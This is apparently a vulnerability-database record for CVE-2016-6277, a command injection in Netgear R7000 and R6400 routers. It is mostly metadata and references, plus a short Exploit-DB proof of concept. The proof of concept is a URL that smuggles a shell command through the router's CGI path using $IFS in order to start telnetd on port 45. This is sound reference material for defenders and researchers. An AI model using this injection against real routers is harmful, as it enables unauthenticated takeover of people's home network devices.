ID
VAR-E-201612-0018
CVE
cve_id: | CVE-2016-6277 | Trust: 2.3 |
EDB ID
40889
TITLE
Netgear R7000 - Command Injection - CGI webapps Exploit
Trust: 0.6
DESCRIPTION
Netgear R7000 - Command Injection. CVE-2016-6277 . webapps exploit for CGI platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | netgear | model: | r7000 | scope: | - | version: | - | Trust: 1.6 |
vendor: | netgear | model: | r6400 | scope: | - | version: | - | Trust: 0.5 |
vendor: | netgear | model: | r7000 r6400 cgi-bin | scope: | eq | version: | / | Trust: 0.5 |
vendor: | netgear | model: | r8000 1.0.3.4 1.1.2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | netgear | model: | r7000 1.0.7.2 1.1.93 | scope: | - | version: | - | Trust: 0.3 |
vendor: | netgear | model: | r6400 1.0.1.6 1.0.4 | scope: | - | version: | - | Trust: 0.3 |
EXPLOIT
# Exploit Title: Netgear R7000 - Command Injection
# Date: 6-12-2016
# Exploit Author: Acew0rm
# Contact: https://twitter.com/Acew0rm1
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93
-Vulnerability
An unauthenticated user can inject commands threw
http://RouterIP/cgi-bin/;COMMAND.
-Proof Of Concept
http://RouterIP/;telnetd$IFS-p$IFS'45' will open telnet on port 45.
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Command Injection
Trust: 1.6
TAGS
tag: | exploit | Trust: 1.0 |
tag: | remote | Trust: 0.5 |
tag: | code execution | Trust: 0.5 |
tag: | arbitrary | Trust: 0.5 |
CREDITS
Acew0rm
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2016-6277 | Trust: 2.3 |
db: | NVD | id: | CVE-2016-582384 | Trust: 2.0 |
db: | CERT/CC | id: | VU#582384 | Trust: 2.0 |
db: | EXPLOIT-DB | id: | 40889 | Trust: 1.6 |
db: | EDBNET | id: | 89479 | Trust: 0.6 |
db: | EDBNET | id: | 91885 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 27299 | Trust: 0.6 |
db: | EDBNET | id: | 91907 | Trust: 0.6 |
db: | PACKETSTORM | id: | 155712 | Trust: 0.5 |
db: | PACKETSTORM | id: | 141585 | Trust: 0.5 |
db: | BID | id: | 94819 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2016-6277 | Trust: 2.0 |
url: | https://www.exploit-db.com/exploits/40889/ | Trust: 0.6 |
url: | https://www.intelligentexploit.com | Trust: 0.6 |
url: | https://0day.today/exploits/27299 | Trust: 0.6 |
url: | http://kb.netgear.com/000036386/cve-2016-582384 | Trust: 0.3 |
url: | http://www.kb.cert.org/vuls/id/582384 | Trust: 0.3 |
SOURCES
db: | BID | id: | 94819 |
db: | PACKETSTORM | id: | 155712 |
db: | PACKETSTORM | id: | 141585 |
db: | EXPLOIT-DB | id: | 40889 |
db: | EDBNET | id: | 89479 |
db: | EDBNET | id: | 91885 |
db: | EDBNET | id: | 91907 |
LAST UPDATE DATE
2022-07-27T09:24:24.316000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 94819 | date: | 2017-01-12T01:04:00 |
SOURCES RELEASE DATE
db: | BID | id: | 94819 | date: | 2016-12-09T00:00:00 |
db: | PACKETSTORM | id: | 155712 | date: | 2019-12-17T15:52:02 |
db: | PACKETSTORM | id: | 141585 | date: | 2017-03-12T00:54:02 |
db: | EXPLOIT-DB | id: | 40889 | date: | 2016-12-07T00:00:00 |
db: | EDBNET | id: | 89479 | date: | 2016-12-08T00:00:00 |
db: | EDBNET | id: | 91885 | date: | 2017-03-14T00:00:00 |
db: | EDBNET | id: | 91907 | date: | 2017-03-15T00:00:00 |